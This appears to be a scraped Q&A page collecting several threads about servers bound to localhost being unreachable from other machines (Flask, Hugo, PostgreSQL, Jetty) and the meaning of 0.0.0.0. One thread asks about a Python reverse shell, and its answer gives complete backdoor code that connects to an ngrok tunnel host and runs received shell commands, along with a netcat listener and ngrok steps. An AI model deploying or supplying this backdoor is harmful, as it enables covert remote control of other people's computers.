This question already has answers here:
Configure Flask dev server to be visible across the network
(17 answers)
Closed 1 year ago.
I have flask running in a daemon on my Raspi.
#app.route("/cmd",methods = ['POST', 'GET'])
def cmd():
if request.method == 'GET':
order_obj = request.args.to_dict(flat=True)
else:
order_obj = request.get_json(force=True)
response = jsonify(controller_obj.act_on_order(order_obj))
response.headers.add('Access-Control-Allow-Origin', '*')
return response
app.run(port=8087, debug=config.DEBUG, use_reloader=False)
When I run this app, I can see it is listening on port 8087:
pi#brs-tv:~/brs $ sudo netstat -lptu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 localhost:8087 0.0.0.0:* LISTEN 4133/python
When I telnet to the port locally using localhost, it works fine.
pi#brs-tv:~/brs $ telnet localhost 8087
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cmd
But when I telnet locally to its local address, I get connection refused:
pi#brs-tv:~/brs $ telnet brs-tv.local 8087
Trying 127.0.1.1...
telnet: Unable to connect to remote host: Connection refused
Is this a Rpi thing, or a Flask thing?
It turns out it is a Flask thing.
host (Optional[str]) – the hostname to listen on. Set this to '0.0.0.0' to have the server available externally as well. Defaults to
'127.0.0.1' or the host in the SERVER_NAME config variable if present.
So, fixing my Flask run call:
app.run(host="0.0.0.0", port=config.CONTROLLERS[whoami]["port"],
debug=config.DEBUG, use_reloader=False)
Now, my port is listening to the rest of the world:
pi#brs-tv:~ $ sudo netstat -lptu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8087 0.0.0.0:* LISTEN 1213/python
I can also now connect from another machine:
Ricos-vt220:~ % telnet brs-tv.local 8087
Trying fe80::3d7:b64:bb26:14e0...
telnet: connect to address fe80::3d7:b64:bb26:14e0: Connection refused
Trying 192.168.86.29...
Connected to brs-tv.local.
Escape character is '^]'.
GET /cmd
Related
On a CentOS Linux 7 machine, I have a web app served on port 1314
$ netstat -anp | grep 1314
tcp 0 0 127.0.0.1:1314 0.0.0.0:* LISTEN 1464/hugo
tcp 0 0 127.0.0.1:60770 127.0.0.1:1314 TIME_WAIT -
and I can curl it locally.
I opened port 1314:
iptables-save | grep 1314
-A IN_public_allow -p tcp -m tcp --dport 1314 -m conntrack --ctstate NEW,UNTRACKED -j ACCEPT
I checked with nmap locally:
PORT STATE SERVICE
1314/tcp open pdps
Everything seems fine.
Now if I try to curl the web app from another machine I get connection refused.
When I try nmap from the remote machine:
PORT STATE SERVICE
1314/tcp closed pdps
So the firewall doesn't block the port, but it looks like there is no one listening on port 1314...
But we know that the web app is running on this endpoint so what is going on??
Having a process listening to a port (and that port is open and properly configured) is not enough to enable remote communication. The local address needs to be on the same network as the remote address too!
Here, on the netstat printout, we can see that the local address is localhost (127.0.0.1 or ::1). Localhost is obviously not on the same network as the remote machine I was using to curl my web app. This explains also why nmap was reporting a closed port (meaning that nothing was listening on the local end).
Note: to listen to all the network interfaces, the local address should be 0.0.0.0 or :::.
i create a reverse shell with python and i have a problem with my router in port forwarding.
I don't have any static ip.
In router:
Protocol: TCP
Lochealipaddr: 192.168.1.10
Localport: 8090
Wanipaddr: ---
Wanport: 8090
state: enable
in my python script i cant bind on my wan ip address
ST.bind((Wanipaddr, 8090))
if i binding on localipaddr my reverse shell client can't connect to the server
whats my problem solution??
thanks
if you want to use your backdoor to receive connections outside LAN use ngrok
example:
1- lets listen on port 4444:
nc -lp 4444
2- after ngrok is installed you will run this command:
ngrok tcp 444
3- now find the ngrok address
ngrok address
4- use your ngrok address to the client connect
# backdoor.py
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = '0.tcp.ngrok.io'
PORT = 12969
s.connect((HOST, PORT))
while True:
conn = s.recv(2048).decode()
if conn[:3] == 'cd ':
os.chdir(conn[3:])
cmd = ''
else:
proc = subprocess.Popen(conn, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.DEVNULL, shell=True)
stdout, stderr = proc.communicate()
cmd = stdout+stderr
cmd += str('\n'+os.getcwd()).encode()
s.send(cmd)
5- now you can connect with anyone outside your network
shell
It sounds like your router is configured to forward requests from the internet on port 8090 to your host (assuming you have the correct LAN IP). Perhaps just try binding to 0.0.0.0.
From wikipedia, it fits this context:
A way to specify "any IPv4 address at all". It is used in this way when configuring servers (i.e. when binding listening sockets).
In other words, you're telling your server to essentially listen on every available network interface (on that port).
I suspect the issue is the HTTP proxy in the server. But I am not sure.
I set up a hello world Flask app on Ubuntu, I was able to access the page by
elinks http://localhost:5000, # and
elinks http://127.0.0.1:5000, # but not
But NOT
elinks http://<server_ip_in_LAN>:5000 # I was also not able to remote access the page on another machine
Then I looked at my proxy settings, in /etc/environment, it has the following:
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"
http_proxy="http://proxy-ip:8080/"
https_proxy="http://proxy-ip:8080/"
ftp_proxy="http://proxy-ip:8080/"
git_proxy="http://proxy-ip:8080/"
no_proxy="localhost,127.0.0.1,localaddress,.localdomain.com"
HTTP_PROXY="http://proxy-ip:8080/"
HTTPS_PROXY="http://proxy-ip:8080/"
FTP_PROXY="http://proxy-ip:8080/"
GIT_PROXY="http://proxy-ip:8080/"
NO_PROXY="localhost,127.0.0.1,localaddress,.localdomain.com"
Further, I use ufw to control the firewall, port 5000 is allowed from anywhere.
And I was able to see the following by running nmap -Pn localhost
$ nmap -Pn localhost
Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-04 21:09 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00016s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
5000/tcp open upnp
5432/tcp open postgresql
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
However, if I run
nmap -Pn <server_ip_in_LAN>,
the "5000/tcp open upnp" line was missing, implying the port number seems only open to my localhost, but not open to LAN.
Why? How can I solve it?
Thanks in advance.
Flask often use internal host:
127.0.0.1
. So you can connect by server_ip_in_LAN by change host IP:
app.run(host= '0.0.0.0')
I have faced the similar kind of issue when I was trying to set my first pycharm project for flask.
Things you need to check
HTTP Proxy(if you are behind a proxy)
Verify the proxy details if proxy added
Check for port if not already used.
for flask specific(if you want to run on specific host and port)
app.run(host='0.0.0.0',port='5000', debug=True)
It gets started on 0.0.0.0 you can change it to localhost.
I have a Django project, I want to switch from SQLite to PostgreSQL.
After installation, I can't run the command psql
Here is the traceback:
psql: could not connect to server: Connection refused (0x0000274D/10061)
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused (0x0000274D/10061)
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
OS: Windows
TCP/IP connections are not enabled by default, so you probably have to edit a file called postgres.conf:
vi /etc/postgresql/9.4/main/postgresql.conf
For you it may reside in a different location. Look for a line saying:
#listen_addresses = '' # what IP address(es) to listen on;
Change it to this:
listen_addresses = '*' # what IP address(es) to listen on;
Right under this there's the port setting. For me it reads:
port = 5432 # (change requires restart)
Higher up in the same file there is a reference to another config file:
hba_file = '/etc/postgresql/9.4/main/pg_hba.conf' # host-based authentication file
Go ahead and edit that file. You should insert a line like this:
host all all 192.168.1.0 255.255.255.0 trust
Your IP may be different. (Once you ensure this is working, you can change "trust" to "md5" for better security.) After doing this, you need to restart the postgres server.
/usr/lib/postgresql/9.4/bin/pg_ctl restart
I was trying remote debug a webapp. Follows the instruction on this jetty document . I got java process like this.
jetty 9682 0.4 2.2 4433620 87568 ? Sl 15:52 0:03 /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-0.b17.el6_7.x86_64/jre/bin/java -Xdebug -agentlib:jdwp=transport=dt_socket,address=12000,server=y,suspend=n -Djava.io.tmpdir=/tmp -Djetty.home=/opt/jetty -Djetty.base=/opt/jetty
But the process only listens on 0.0.0.0.
Here is the output of netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12000 0.0.0.0:* LISTEN
So i can't connect this port on other IP.
My questions how this happen and how to fix it?
EDIT: I was wrong. I was confused by the output of netstat. Because the output of port 8080 is
tcp 0 0 :::8080 :::* LISTEN
I finally realized this may caused by the firewall. I solved the problem by add this port to iptables.
0.0.0.0 means "all IPv4 addresses on the local machine". If a host has two IP addresses, 192.168.1.1 and 10.1.2.1, and a server running on the host listens on 0.0.0.0, it will be reachable at both of those IPs.
From: https://en.wikipedia.org/wiki/0.0.0.0
More info at Is binding to 0.0.0.0 in Java guaranteed to bind to all network interfaces?